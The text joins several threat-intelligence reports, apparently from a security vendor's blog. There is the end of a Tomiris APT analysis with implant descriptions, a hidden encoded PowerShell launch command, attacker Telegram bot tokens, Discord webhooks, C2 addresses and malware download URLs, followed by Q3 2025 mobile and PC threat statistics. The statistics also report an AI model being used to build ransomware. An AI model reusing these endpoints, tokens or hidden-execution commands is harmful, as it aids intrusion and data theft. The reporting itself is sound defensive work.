URL = hxxps://api.telegram[.]org/bot7804558453:AAFR2OjF7ktvyfygleIneu_8WDaaSkduV7k/
CHAT_ID = 7709228285

JLORAT

One of the oldest implants used by malicious actors has undergone virtually no changes since it was first identified in 2022. It is capable of taking screenshots, executing console commands, and uploading files from the infected system to the C2. The current version of the Trojan lacks only the download command.

Tomiris Rust ReverseShell

This Trojan is a simple reverse shell written in the Rust programming language. Unlike other reverse shells used by attackers, it uses PowerShell as the shell rather than cmd.exe.

Tomiris Go ReverseShell

The Trojan is a simple reverse shell written in Go. We were able to restore the source code. It establishes a TCP connection to 62.113.114.209 on port 443, runs cmd.exe and redirects standard command line input and output to the established connection.

Tomiris PowerShell Telegram Backdoor

The original executable is a simple packer written in C++. It extracts a Base64-encoded PowerShell script from itself and executes it using the following command line:

powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand JABjAGgAYQB0AF8AaQBkACAAPQAgACIANwA3ADAAOQAyADIAOAAyADgANQ…………

The extracted script is a backdoor written in PowerShell that uses Telegram to communicate with the C2 server. It has only two key commands:

• /upload: Download a file from Telegram using a file_Id identifier provided as a parameter and save it to “C:\Users\Public\Libraries\” with the name specified in the parameter file_name.
• /go: Execute a provided command in the console and return the results as a Telegram message.

The script uses the following credentials for communication:

$chat_id = "7709228285"
$botToken = "8039791391:AAHcE2qYmeRZ5P29G6mFAylVJl8qH_ZVBh8"
$apiUrl = "hxxps://api.telegram[.]org/bot$botToken/"

Tomiris C# ReverseShell

A simple reverse shell written in C#. It doesn’t support any additional commands beyond console commands.

Other implants

During the investigation, we also discovered several reverse SOCKS proxy implants on the servers from which subsequent implants were downloaded. These samples were also found on infected systems. Unfortunately, we were unable to determine which implant was specifically used to download them. We believe these implants are likely used to proxy traffic from vulnerability scanners and enable lateral movement within the network.

Tomiris C++ ReverseSocks (based on GitHub Neosama/Reverse-SOCKS5)

The implant is a reverse SOCKS proxy written in C++, with code that is almost entirely copied from the GitHub project Neosama/Reverse-SOCKS5. Debugging messages from the original project have been removed, and functionality to hide the console window has been added.

Tomiris Go ReverseSocks (based on GitHub Acebond/ReverseSocks5)

The Trojan is a reverse SOCKS proxy written in Golang, with code that is almost entirely copied from the GitHub project Acebond/ReverseSocks5. Debugging messages from the original project have been removed, and functionality to hide the console window has been added.

Victims

Over 50% of the spear-phishing emails and decoy files in this campaign used Russian names and contained Russian text, suggesting a primary focus on Russian-speaking users or entities. The remaining emails were tailored to users in Turkmenistan, Kyrgyzstan, Tajikistan, and Uzbekistan, and included content in their respective national languages.

Attribution

In our previous report, we described the JLORAT tool used by the Tomiris APT group. By analyzing numerous JLORAT samples, we were able to identify several distinct propagation patterns commonly employed by the attackers. These patterns include the use of long and highly specific filenames, as well as the distribution of these tools in password-protected archives with passwords in the format “xyz@2025” (for example, “min@2025” or “sib@2025”). These same patterns were also observed with reverse shells and other tools described in this article. Moreover, different malware samples were often distributed under the same file name, indicating their connection. Below is a brief list of overlaps among tools with similar file names:

Filename (for convenience, we used the asterisk character to substitute numerous space symbols before file extension)	Tool
аппарат правительства российской федерации по вопросу отнесения реализуемых на территории сибирского федерального округа*.exe (translated: Federal Government Agency of the Russian Federation regarding the issue of designating objects located in the Siberian Federal District*.exe)	Tomiris C/C++ ReverseShell: 078be0065d0277935cdcf7e3e9db4679 33ed1534bbc8bd51e7e2cf01cadc9646 536a48917f823595b990f5b14b46e676 9ea699b9854dde15babf260bed30efcc Tomiris Rust ReverseShell: 9a9b1ba210ac2ebfe190d1c63ec707fa Tomiris Go ReverseShell: c26e318f38dfd17a233b23a3ff80b5f4 Tomiris PowerShell Telegram Backdoor: c75665e77ffb3692c2400c3c8dd8276b
О работе почтового сервера план и проведенная работа*.exe (translated: Work of the mail server: plan and performed work*.exe)	Tomiris C/C++ ReverseShell: 0f955d7844e146f2bd756c9ca8711263 Tomiris Rust Downloader: 1083b668459beacbc097b3d4a103623f Tomiris C# ReverseShell: abb3e2b8c69ff859a0ec49b9666f0a01 Tomiris Go ReverseShell: c26e318f38dfd17a233b23a3ff80b5f4
план-протокол встречи о сотрудничестве представителей*.exe (translated: Meeting plan-protocol on cooperation representatives*.exe)	Tomiris PowerShell Telegram Backdoor: 09913c3292e525af34b3a29e70779ad6 0ddc7f3cfc1fb3cea860dc495a745d16 Tomiris C/C++ ReverseShell: 0f955d7844e146f2bd756c9ca8711263 Tomiris Rust Downloader: 1083b668459beacbc097b3d4a103623f 72327bf7a146273a3cfec79c2cbbe54e d3641495815c9617e58470448a1c94db JLORAT: c73c545c32e5d1f72b74ab0087ae1720
положения о центрах передового опыта (превосходства) в рамках межгосударственной программы*.exe (translated: Provisions on Centers of Best Practices (Excellence) within the framework of the interstate program*.exe)	Tomiris PowerShell Telegram Backdoor: 09913c3292e525af34b3a29e70779ad6 Tomiris C/C++ ReverseShell: 33ed1534bbc8bd51e7e2cf01cadc9646 9ea699b9854dde15babf260bed30efcc JLORAT: 6a49982272ba11b7985a2cec6fbb9a96 c73c545c32e5d1f72b74ab0087ae1720 Tomiris Rust Downloader: 72327bf7a146273a3cfec79c2cbbe54e

We also analyzed the group’s activities and found other tools associated with them that may have been stored on the same servers or used the same servers as a C2 infrastructure. We are highly confident that these tools all belong to the Tomiris group.

Conclusions

The Tomiris 2025 campaign leverages multi-language malware modules to enhance operational flexibility and evade detection by appearing less suspicious. The primary objective is to establish remote access to target systems and use them as a foothold to deploy additional tools, including AdaptixC2 and Havoc, for further exploitation and persistence.

The evolution in tactics underscores the threat actor’s focus on stealth, long-term persistence, and the strategic targeting of government and intergovernmental organizations. The use of public services for C2 communications and multi-language implants highlights the need for advanced detection strategies, such as behavioral analysis and network traffic inspection, to effectively identify and mitigate such threats.

Indicators of compromise

More indicators of compromise, as well as any updates to them, are available to customers of our APT reporting service. If interested, please contact intelreports@kaspersky.com.

Distopia Backdoor
B8FE3A0AD6B64F370DB2EA1E743C84BB

Tomiris Python Discord ReverseShell
091FBACD889FA390DC76BB24C2013B59

Tomiris Python FileGrabber
C0F81B33A80E5E4E96E503DBC401CBEE

Tomiris Python Telegram ReverseShell
42E165AB4C3495FADE8220F4E6F5F696

Tomiris C# Telegram ReverseShell
2FBA6F91ADA8D05199AD94AFFD5E5A18

Tomiris C/C++ ReverseShell
0F955D7844E146F2BD756C9CA8711263
078BE0065D0277935CDCF7E3E9DB4679
33ED1534BBC8BD51E7E2CF01CADC9646

Tomiris Rust Downloader
1083B668459BEACBC097B3D4A103623F

JLORAT
C73C545C32E5D1F72B74AB0087AE1720

Tomiris Rust ReverseShell
9A9B1BA210AC2EBFE190D1C63EC707FA

Tomiris C++ ReverseSocks (based on GitHub Neosama/Reverse-SOCKS5)
2ED5EBC15B377C5A03F75E07DC5F1E08

Tomiris PowerShell Telegram Backdoor
C75665E77FFB3692C2400C3C8DD8276B

Tomiris C# ReverseShell
DF95695A3A93895C1E87A76B4A8A9812

Tomiris Go ReverseShell
087743415E1F6CC961E9D2BB6DFD6D51

Tomiris Go ReverseSocks (based on GitHub Acebond/ReverseSocks5)
83267C4E942C7B86154ACD3C58EAF26C

AdaptixC2
CD46316AEBC41E36790686F1EC1C39F0
1241455DA8AADC1D828F89476F7183B7
F1DCA0C280E86C39873D8B6AF40F7588

Havoc
4EDC02724A72AFC3CF78710542DB1E6E

Domains/IPs/URLs
Distopia Backdoor
hxxps://discord[.]com/api/webhooks/1357597727164338349/ikaFqukFoCcbdfQIYXE91j-dGB-8YsTNeSrXnAclYx39Hjf2cIPQalTlAxP9-2791UCZ

Tomiris Python Discord ReverseShell
hxxps://discord[.]com/api/webhooks/1370623818858762291/p1DC3l8XyGviRFAR50de6tKYP0CCr1hTAes9B9ljbd-J-dY7bddi31BCV90niZ3bxIMu
hxxps://discord[.]com/api/webhooks/1388018607283376231/YYJe-lnt4HyvasKlhoOJECh9yjOtbllL_nalKBMUKUB3xsk7Mj74cU5IfBDYBYX-E78G
hxxps://discord[.]com/api/webhooks/1386588127791157298/FSOtFTIJaNRT01RVXk5fFsU_sjp_8E0k2QK3t5BUcAcMFR_SHMOEYyLhFUvkY3ndk8-w
hxxps://discord[.]com/api/webhooks/1369277038321467503/KqfsoVzebWNNGqFXePMxqi0pta2445WZxYNsY9EsYv1u_iyXAfYL3GGG76bCKy3-a75
hxxps://discord[.]com/api/webhooks/1396726652565848135/OFds8Do2qH-C_V0ckaF1AJJAqQJuKq-YZVrO1t7cWuvAp7LNfqI7piZlyCcS1qvwpXTZ

Tomiris Python FileGrabber
hxxp://62.113.115[.]89/homepage/infile.php

Tomiris Python Telegram ReverseShell
hxxps://api.telegram[.]org/bot7562800307:AAHVB7Ctr-K52J-egBlEdVoRHvJcYr-0nLQ/

Tomiris C# Telegram ReverseShell
hxxps://api.telegram[.]org/bot7804558453:AAFR2OjF7ktvyfygleIneu_8WDaaSkduV7k/

Tomiris C/C++ ReverseShell
77.232.39[.]47
109.172.85[.]63
109.172.85[.]95
185.173.37[.]67
185.231.155[.]111
195.2.81[.]99

Tomiris Rust Downloader
hxxps://discordapp[.]com/api/webhooks/1392383639450423359/TmFw-WY-u3D3HihXqVOOinL73OKqXvi69IBNh_rr15STd3FtffSP2BjAH59ZviWKWJRX
hxxps://discordapp[.]com/api/webhooks/1363764458815623370/IMErckdJLreUbvxcUA8c8SCfhmnsnivtwYSf7nDJF-bWZcFcSE2VhXdlSgVbheSzhGYE
hxxps://discordapp[.]com/api/webhooks/1355019191127904457/xCYi5fx_Y2-ddUE0CdHfiKmgrAC-Cp9oi-Qo3aFG318P5i-GNRfMZiNFOxFrQkZJNJsR
hxxp://82.115.223[.]218/
hxxp://172.86.75[.]102/
hxxp://193.149.129[.]113/

JLORAT
hxxp://82.115.223[.]210:9942/bot_auth
hxxp://88.214.26[.]37:9942/bot_auth
hxxp://141.98.82[.]198:9942/bot_auth

Tomiris Rust ReverseShell
185.209.30[.]41

Tomiris C++ ReverseSocks (based on GitHub “Neosama/Reverse-SOCKS5”)
185.231.154[.]84

Tomiris PowerShell Telegram Backdoor
hxxps://api.telegram[.]org/bot8044543455:AAG3Pt4fvf6tJj4Umz2TzJTtTZD7ZUArT8E/
hxxps://api.telegram[.]org/bot7864956192:AAEjExTWgNAMEmGBI2EsSs46AhO7Bw8STcY/
hxxps://api.telegram[.]org/bot8039791391:AAHcE2qYmeRZ5P29G6mFAylVJl8qH_ZVBh8/
hxxps://api.telegram[.]org/bot7157076145:AAG79qKudRCPu28blyitJZptX_4z_LlxOS0/
hxxps://api.telegram[.]org/bot7649829843:AAH_ogPjAfuv-oQ5_Y-s8YmlWR73Gbid5h0/

Tomiris C# ReverseShell
206.188.196[.]191
188.127.225[.]191
188.127.251[.]146
94.198.52[.]200
188.127.227[.]226
185.244.180[.]169
91.219.148[.]93

Tomiris Go ReverseShell
62.113.114[.]209
195.2.78[.]133

Tomiris Go ReverseSocks (based on GitHub “Acebond/ReverseSocks5”)
192.165.32[.]78
188.127.231[.]136

AdaptixC2
77.232.42[.]107
94.198.52[.]210
96.9.124[.]207
192.153.57[.]189
64.7.199[.]193

Havoc
78.128.112[.]209

Malicious URLs
hxxp://188.127.251[.]146:8080/sbchost.rar
hxxp://188.127.251[.]146:8080/sxbchost.exe
hxxp://192.153.57[.]9/private/svchost.exe
hxxp://193.149.129[.]113/732.exe
hxxp://193.149.129[.]113/system.exe
hxxp://195.2.79[.]245/732.exe
hxxp://195.2.79[.]245/code.exe
hxxp://195.2.79[.]245/firefox.exe
hxxp://195.2.79[.]245/rever.exe
hxxp://195.2.79[.]245/service.exe
hxxp://195.2.79[.]245/winload.exe
hxxp://195.2.79[.]245/winload.rar
hxxp://195.2.79[.]245/winsrv.rar
hxxp://195.2.79[.]245/winupdate.exe
hxxp://62.113.115[.]89/offel.exe
hxxp://82.115.223[.]78/private/dwm.exe
hxxp://82.115.223[.]78/private/msview.exe
hxxp://82.115.223[.]78/private/spoolsvc.exe
hxxp://82.115.223[.]78/private/svchost.exe
hxxp://82.115.223[.]78/private/sysmgmt.exe
hxxp://85.209.128[.]171:8000/AkelPad.rar
hxxp://88.214.25[.]249:443/netexit.rar
hxxp://89.110.95[.]151/dwm.exe
hxxp://89.110.98[.]234/Rar.exe
hxxp://89.110.98[.]234/code.exe
hxxp://89.110.98[.]234/rever.rar
hxxp://89.110.98[.]234/winload.exe
hxxp://89.110.98[.]234/winload.rar
hxxp://89.110.98[.]234/winrm.exe
hxxps://docsino[.]ru/wp-content/private/alone.exe
hxxps://docsino[.]ru/wp-content/private/winupdate.exe
hxxps://sss.qwadx[.]com/12345.exe
hxxps://sss.qwadx[.]com/AkelPad.exe
hxxps://sss.qwadx[.]com/netexit.rar
hxxps://sss.qwadx[.]com/winload.exe
hxxps://sss.qwadx[.]com/winsrv.exe

IT threat evolution in Q3 2025. Mobile statistics
IT threat evolution in Q3 2025. Non-mobile statistics

The quarter at a glance

In the third quarter of 2025, we updated the methodology for calculating statistical indicators based on the Kaspersky Security Network. These changes affected all sections of the report except for the statistics on installation packages, which remained unchanged.

To illustrate the differences between the reporting periods, we have also recalculated data for the previous quarters. Consequently, these figures may significantly differ from the previously published ones. However, subsequent reports will employ this new methodology, enabling precise comparisons with the data presented in this post.

The Kaspersky Security Network (KSN) is a global network for analyzing anonymized threat information, voluntarily shared by users of Kaspersky solutions. The statistics in this report are based on KSN data unless explicitly stated otherwise.

The quarter in numbers

According to Kaspersky Security Network, in Q3 2025:

• 47 million attacks utilizing malware, adware, or unwanted mobile software were prevented.

• Trojans were the most widespread threat among mobile malware, encountered by 15.78% of all attacked users of Kaspersky solutions.
• More than 197,000 malicious installation packages were discovered, including:
  • 52,723 associated with mobile banking Trojans.
  • 1564 packages identified as mobile ransomware Trojans.

Quarterly highlights

The number of malware, adware, or unwanted software attacks on mobile devices, calculated according to the updated rules, totaled 3.47 million in the third quarter. This is slightly less than the 3.51 million attacks recorded in the previous reporting period.

Attacks on users of Kaspersky mobile solutions, Q2 2024 — Q3 2025 (download)

At the start of the quarter, a user complained to us about ads appearing in every browser on their smartphone. We conducted an investigation, discovering a new version of the BADBOX backdoor, preloaded on the device. This backdoor is a multi-level loader embedded in a malicious native library, librescache.so, which was loaded by the system framework. As a result, a copy of the Trojan infiltrated every process running on the device.

Another interesting finding was Trojan-Downloader.AndroidOS.Agent.no, which was embedded in mods for messaging and other apps. It downloaded Trojan-Clicker.AndroidOS.Agent.bl onto the device. The clicker received a URL from its server where an ad was being displayed, opened it in an invisible WebView window, and used machine learning algorithms to find and click the close button. In this way, fraudsters exploited the user’s device to artificially inflate ad views.

Mobile threat statistics

In the third quarter, Kaspersky security solutions detected 197,738 samples of malicious and unwanted software for Android, which is 55,000 more than in the previous reporting period.

Detected malicious and potentially unwanted installation packages, Q3 2024 — Q3 2025 (download)

The detected installation packages were distributed by type as follows:

Detected mobile apps by type, Q2* — Q3 2025 (download)

* Changes in the statistical calculation methodology do not affect this metric. However, data for the previous quarter may differ slightly from previously published figures due to a retrospective review of certain verdicts.

The share of banking Trojans decreased somewhat, but this was due less to a reduction in their numbers and more to an increase in other malicious and unwanted packages. Nevertheless, banking Trojans, still dominated by Mamont packages, continue to hold the top spot. The rise in Trojan droppers is also linked to them: these droppers are primarily designed to deliver banking Trojans.

Share* of users attacked by the given type of malicious or potentially unwanted app out of all targeted users of Kaspersky mobile products, Q2 — Q3 2025 (download)

* The total may exceed 100% if the same users experienced multiple attack types.

Adware leads the pack in terms of the number of users attacked, with a significant margin. The most widespread types of adware are HiddenAd (56.3%) and MobiDash (27.4%). RiskTool-type unwanted apps occupy the second spot. Their growth is primarily due to the proliferation of the Revpn module, which monetizes user internet access by turning their device into a VPN exit point. The most popular Trojans predictably remain Triada (55.8%) and Fakemoney (24.6%). The percentage of users who encountered these did not undergo significant changes.

TOP 20 most frequently detected types of mobile malware

Note that the malware rankings below exclude riskware and potentially unwanted software, such as RiskTool or adware.

Verdict	%* Q2 2025	%* Q3 2025	Difference in p.p.	Change in ranking
Trojan.AndroidOS.Triada.ii	0.00	13.78	+13.78
Trojan.AndroidOS.Triada.fe	12.54	10.32	–2.22	–1
Trojan.AndroidOS.Triada.gn	9.49	8.56	–0.93	–1
Trojan.AndroidOS.Fakemoney.v	8.88	6.30	–2.59	–1
Backdoor.AndroidOS.Triada.z	3.75	4.53	+0.77	+1
DangerousObject.Multi.Generic.	4.39	4.52	+0.13	–1
Trojan-Banker.AndroidOS.Coper.c	3.20	2.86	–0.35	+1
Trojan.AndroidOS.Triada.if	0.00	2.82	+2.82
Trojan-Dropper.Linux.Agent.gen	3.07	2.64	–0.43	+1
Trojan-Dropper.AndroidOS.Hqwar.cq	0.37	2.52	+2.15	+60
Trojan.AndroidOS.Triada.hf	2.26	2.41	+0.14	+2
Trojan.AndroidOS.Triada.ig	0.00	2.19	+2.19
Backdoor.AndroidOS.Triada.ab	0.00	2.00	+2.00
Trojan-Banker.AndroidOS.Mamont.da	5.22	1.82	–3.40	–10
Trojan-Banker.AndroidOS.Mamont.hi	0.00	1.80	+1.80
Trojan.AndroidOS.Triada.ga	3.01	1.71	–1.29	–5
Trojan.AndroidOS.Boogr.gsh	1.60	1.68	+0.08	0
Trojan-Downloader.AndroidOS.Agent.nq	0.00	1.63	+1.63
Trojan.AndroidOS.Triada.hy	3.29	1.62	–1.67	–12
Trojan-Clicker.AndroidOS.Agent.bh	1.32	1.56	+0.24	0

* Unique users who encountered this malware as a percentage of all attacked users of Kaspersky mobile solutions.

The top positions in the list of the most widespread malware are once again occupied by modified messaging apps Triada.ii, Triada.fe, Triada.gn, and others. The pre-installed backdoor Triada.z ranked fifth, immediately following Fakemoney – fake apps that collect users’ personal data under the guise of providing payments or financial services. The dropper that landed in ninth place, Agent.gen, is an obfuscated ELF file linked to the banking Trojan Coper.c, which sits immediately after DangerousObject.Multi.Generic.

Region-specific malware

In this section, we describe malware that primarily targets users in specific countries.

Verdict	Country*	%**
Trojan-Dropper.AndroidOS.Hqwar.bj	Turkey	97.22
Trojan-Banker.AndroidOS.Coper.c	Turkey	96.35
Trojan-Dropper.AndroidOS.Agent.sm	Turkey	95.10
Trojan-Banker.AndroidOS.Coper.a	Turkey	95.06
Trojan-Dropper.AndroidOS.Agent.uq	India	92.20
Trojan-Banker.AndroidOS.Rewardsteal.qh	India	91.56
Trojan-Banker.AndroidOS.Agent.wb	India	85.89
Trojan-Dropper.AndroidOS.Rewardsteal.ab	India	84.14
Trojan-Dropper.AndroidOS.Banker.bd	India	82.84
Backdoor.AndroidOS.Teledoor.a	Iran	81.40
Trojan-Dropper.AndroidOS.Hqwar.gy	Turkey	80.37
Trojan-Dropper.AndroidOS.Banker.ac	India	78.55
Trojan-Ransom.AndroidOS.Rkor.ii	Germany	76.90
Trojan-Dropper.AndroidOS.Banker.bg	India	75.12
Trojan-Banker.AndroidOS.UdangaSteal.b	Indonesia	75.00
Trojan-Dropper.AndroidOS.Banker.bc	India	74.73
Backdoor.AndroidOS.Teledoor.c	Iran	70.33

* The country where the malware was most active.
** Unique users who encountered this Trojan modification in the indicated country as a percentage of all Kaspersky mobile security solution users attacked by the same modification.

Banking Trojans, primarily Coper, continue to operate actively in Turkey. Indian users also attract threat actors distributing this type of software. Specifically, the banker Rewardsteal is active in the country. Teledoor backdoors, embedded in a fake Telegram client, have been deployed in Iran.
Notable is the surge in Rkor ransomware Trojan attacks in Germany. The activity was significantly lower in previous quarters. It appears the fraudsters have found a new channel for delivering malicious apps to users.

Mobile banking Trojans

In the third quarter of 2025, 52,723 installation packages for mobile banking Trojans were detected, 10,000 more than in the second quarter.

Installation packages for mobile banking Trojans detected by Kaspersky, Q3 2024 — Q3 2025 (download)

The share of the Mamont Trojan among all bankers slightly increased again, reaching 61.85%. However, in terms of the share of attacked users, Coper moved into first place, with the same modification being used in most of its attacks. Variants of Mamont ranked second and lower, as different samples were used in different attacks. Nevertheless, the total number of users attacked by the Mamont family is greater than that of users attacked by Coper.

TOP 10 mobile bankers

Verdict	%* Q2 2025	%* Q3 2025	Difference in p.p.	Change in ranking
Trojan-Banker.AndroidOS.Coper.c	13.42	13.48	+0.07	+1
Trojan-Banker.AndroidOS.Mamont.da	21.86	8.57	–13.28	–1
Trojan-Banker.AndroidOS.Mamont.hi	0.00	8.48	+8.48
Trojan-Banker.AndroidOS.Mamont.gy	0.00	6.90	+6.90
Trojan-Banker.AndroidOS.Mamont.hl	0.00	4.97	+4.97
Trojan-Banker.AndroidOS.Agent.ws	0.00	4.02	+4.02
Trojan-Banker.AndroidOS.Mamont.gg	0.40	3.41	+3.01	+35
Trojan-Banker.AndroidOS.Mamont.cb	3.03	3.31	+0.29	+5
Trojan-Banker.AndroidOS.Creduz.z	0.17	3.30	+3.13	+58
Trojan-Banker.AndroidOS.Mamont.fz	0.07	3.02	+2.95	+86

* Unique users who encountered this malware as a percentage of all Kaspersky mobile security solution users who encountered banking threats.

Mobile ransomware Trojans

Due to the increased activity of mobile ransomware Trojans in Germany, which we mentioned in the Region-specific malware section, we have decided to also present statistics on this type of threat. In the third quarter, the number of ransomware Trojan installation packages more than doubled, reaching 1564.

Verdict	%* Q2 2025	%* Q3 2025	Difference in p.p.	Change in ranking
Trojan-Ransom.AndroidOS.Rkor.ii	7.23	24.42	+17.19	+10
Trojan-Ransom.AndroidOS.Rkor.pac	0.27	16.72	+16.45	+68
Trojan-Ransom.AndroidOS.Congur.aa	30.89	16.46	–14.44	–1
Trojan-Ransom.AndroidOS.Svpeng.ac	30.98	16.39	–14.59	–3
Trojan-Ransom.AndroidOS.Rkor.it	0.00	10.09	+10.09
Trojan-Ransom.AndroidOS.Congur.cw	15.71	9.69	–6.03	–3
Trojan-Ransom.AndroidOS.Congur.ap	15.36	9.16	–6.20	–3
Trojan-Ransom.AndroidOS.Small.cj	14.91	8.49	–6.42	–3
Trojan-Ransom.AndroidOS.Svpeng.snt	13.04	8.10	–4.94	–2
Trojan-Ransom.AndroidOS.Svpeng.ah	13.13	7.63	–5.49	–4

* Unique users who encountered the malware as a percentage of all Kaspersky mobile security solution users attacked by ransomware Trojans.

IT threat evolution in Q3 2025. Mobile statistics
IT threat evolution in Q3 2025. Non-mobile statistics

Quarterly figures

In Q3 2025:

• Kaspersky solutions blocked more than 389 million attacks that originated with various online resources.
• Web Anti-Virus responded to 52 million unique links.
• File Anti-Virus blocked more than 21 million malicious and potentially unwanted objects.
• 2,200 new ransomware variants were detected.
• Nearly 85,000 users experienced ransomware attacks.
• 15% of all ransomware victims whose data was published on threat actors’ data leak sites (DLSs) were victims of Qilin.
• More than 254,000 users were targeted by miners.

Ransomware

Quarterly trends and highlights

Law enforcement success

The UK’s National Crime Agency (NCA) arrested the first suspect in connection with a ransomware attack that caused disruptions at numerous European airports in September 2025. Details of the arrest have not been published as the investigation remains ongoing. According to security researcher Kevin Beaumont, the attack employed the HardBit ransomware, which he described as primitive and lacking its own data leak site.

The U.S. Department of Justice filed charges against the administrator of the LockerGoga, MegaCortex and Nefilim ransomware gangs. His attacks caused millions of dollars in damage, putting him on wanted lists for both the FBI and the European Union.

U.S. authorities seized over $2.8 million in cryptocurrency, $70,000 in cash, and a luxury vehicle from a suspect allegedly involved in distributing the Zeppelin ransomware. The criminal scheme involved data theft, file encryption, and extortion, with numerous organizations worldwide falling victim.

A coordinated international operation conducted by the FBI, Homeland Security Investigations (HSI), the U.S. Internal Revenue Service (IRS), and law enforcement agencies from several other countries successfully dismantled the infrastructure of the BlackSuit ransomware. The operation resulted in the seizure of four servers, nine domains, and $1.09 million in cryptocurrency. The objective of the operation was to destabilize the malware ecosystem and protect critical U.S. infrastructure.

Vulnerabilities and attacks

SSL VPN attacks on SonicWall

Since late July, researchers have recorded a rise in attacks by the Akira threat actor targeting SonicWall firewalls supporting SSL VPN. SonicWall has linked these incidents to the already-patched vulnerability CVE-2024-40766, which allows unauthorized users to gain access to system resources. Attackers exploited the vulnerability to steal credentials, subsequently using them to access devices, even those that had been patched. Furthermore, the attackers were able to bypass multi-factor authentication enabled on the devices. SonicWall urges customers to reset all passwords and update their SonicOS firmware.

Scattered Spider uses social engineering to breach VMware ESXi

The Scattered Spider (UNC3944) group is attacking VMware virtual environments. The attackers contact IT support posing as company employees and request to reset their Active Directory password. Once access to vCenter is obtained, the threat actors enable SSH on the ESXi servers, extract the NTDS.dit database, and, in the final phase of the attack, deploy ransomware to encrypt all virtual machines.

Exploitation of a Microsoft SharePoint vulnerability

In late July, researchers uncovered attacks on SharePoint servers that exploited the ToolShell vulnerability chain. In the course of investigating this campaign, which affected over 140 organizations globally, researchers discovered the 4L4MD4R ransomware based on Mauri870 code. The malware is written in Go and packed using the UPX compressor. It demands a ransom of 0.005 BTC.

The application of AI in ransomware development

A UK-based threat actor used Claude to create and launch a ransomware-as-a-service (RaaS) platform. The AI was responsible for writing the code, which included advanced features such as anti-EDR techniques, encryption using ChaCha20 and RSA algorithms, shadow copy deletion, and network file encryption.

Anthropic noted that the attacker was almost entirely dependent on Claude, as they lacked the necessary technical knowledge to provide technical support to their own clients. The threat actor sold the completed malware kits on the dark web for $400–$1,200.

Researchers also discovered a new ransomware strain, dubbed PromptLock, that utilizes an LLM directly during attacks. The malware is written in Go. It uses hardcoded prompts to dynamically generate Lua scripts for data theft and encryption across Windows, macOS and Linux systems. For encryption, it employs the SPECK-128 algorithm, which is rarely used by ransomware groups.

Subsequently, scientists from the NYU Tandon School of Engineering traced back the likely origins of PromptLock to their own educational project, Ransomware 3.0, which they detailed in a prior publication.

The most prolific groups

This section highlights the most prolific ransomware gangs by number of victims added to each group’s DLS. As in the previous quarter, Qilin leads by this metric. Its share grew by 1.89 percentage points (p.p.) to reach 14.96%. The Clop ransomware showed reduced activity, while the share of Akira (10.02%) slightly increased. The INC Ransom group, active since 2023, rose to third place with 8.15%.

Number of each group’s victims according to its DLS as a percentage of all groups’ victims published on all the DLSs under review during the reporting period (download)

Number of new variants

In the third quarter, Kaspersky solutions detected four new families and 2,259 new ransomware modifications, nearly one-third more than in Q2 2025 and slightly more than in Q3 2024.

Number of new ransomware modifications, Q3 2024 — Q3 2025 (download)

Number of users attacked by ransomware Trojans

During the reporting period, our solutions protected 84,903 unique users from ransomware. Ransomware activity was highest in July, while August proved to be the quietest month.

Number of unique users attacked by ransomware Trojans, Q3 2025 (download)

Attack geography

TOP 10 countries attacked by ransomware Trojans

In the third quarter, Israel had the highest share (1.42%) of attacked users. Most of the ransomware in that country was detected in August via behavioral analysis.

	Country/territory*	%**
1	Israel	1.42
2	Libya	0.64
3	Rwanda	0.59
4	South Korea	0.58
5	China	0.51
6	Pakistan	0.47
7	Bangladesh	0.45
8	Iraq	0.44
9	Tajikistan	0.39
10	Ethiopia	0.36

* Excluded are countries and territories with relatively few (under 50,000) Kaspersky users.
** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country/territory.

TOP 10 most common families of ransomware Trojans

	Name	Verdict	%*
1	(generic verdict)	Trojan-Ransom.Win32.Gen	26.82
2	(generic verdict)	Trojan-Ransom.Win32.Crypren	8.79
3	(generic verdict)	Trojan-Ransom.Win32.Encoder	8.08
4	WannaCry	Trojan-Ransom.Win32.Wanna	7.08
5	(generic verdict)	Trojan-Ransom.Win32.Agent	4.40
6	LockBit	Trojan-Ransom.Win32.Lockbit	3.06
7	(generic verdict)	Trojan-Ransom.Win32.Crypmod	2.84
8	(generic verdict)	Trojan-Ransom.Win32.Phny	2.58
9	PolyRansom/VirLock	Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom	2.54
10	(generic verdict)	Trojan-Ransom.MSIL.Agent	2.05

* Unique Kaspersky users attacked by the specific ransomware Trojan family as a percentage of all unique users attacked by this type of threat.

Miners

Number of new variants

In Q3 2025, Kaspersky solutions detected 2,863 new modifications of miners.

Number of new miner modifications, Q3 2025 (download)

Number of users attacked by miners

During the third quarter, we detected attacks using miner programs on the computers of 254,414 unique Kaspersky users worldwide.

Number of unique users attacked by miners, Q3 2025 (download)

Attack geography

TOP 10 countries and territories attacked by miners

	Country/territory*	%**
1	Senegal	3.52
2	Mali	1.50
3	Afghanistan	1.17
4	Algeria	0.95
5	Kazakhstan	0.93
6	Tanzania	0.92
7	Dominican Republic	0.86
8	Ethiopia	0.77
9	Portugal	0.75
10	Belarus	0.75

* Excluded are countries and territories with relatively few (under 50,000) Kaspersky users.
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country/territory.

Attacks on macOS

In April, researchers at Iru (formerly Kandji) reported the discovery of a new spyware family, PasivRobber. We observed the development of this family throughout the third quarter. Its new modifications introduced additional executable modules that were absent in previous versions. Furthermore, the attackers began employing obfuscation techniques in an attempt to hinder sample detection.

In July, we reported on a cryptostealer distributed through fake extensions for the Cursor AI development environment, which is based on Visual Studio Code. At that time, the malicious JavaScript (JS) script downloaded a payload in the form of the ScreenConnect remote access utility. This utility was then used to download cryptocurrency-stealing VBS scripts onto the victim’s device. Later, researcher Michael Bocanegra reported on new fake VS Code extensions that also executed malicious JS code. This time, the code downloaded a malicious macOS payload: a Rust-based loader. This loader then delivered a backdoor to the victim’s device, presumably also aimed at cryptocurrency theft. The backdoor supported the loading of additional modules to collect data about the victim’s machine. The Rust downloader was analyzed in detail by researchers at Iru.

In September, researchers at Jamf reported the discovery of a previously unknown version of the modular backdoor ChillyHell, first described in 2023. Notably, the Trojan’s executable files were signed with a valid developer certificate at the time of discovery.

The new sample had been available on Dropbox since 2021. In addition to its backdoor functionality, it also contains a module responsible for bruteforcing passwords of existing system users.

By the end of the third quarter, researchers at Microsoft reported new versions of the XCSSET spyware, which targets developers and spreads through infected Xcode projects. These new versions incorporated additional modules for data theft and system persistence.

TOP 20 threats to macOS

Unique users* who encountered this malware as a percentage of all attacked users of Kaspersky security solutions for macOS (download)

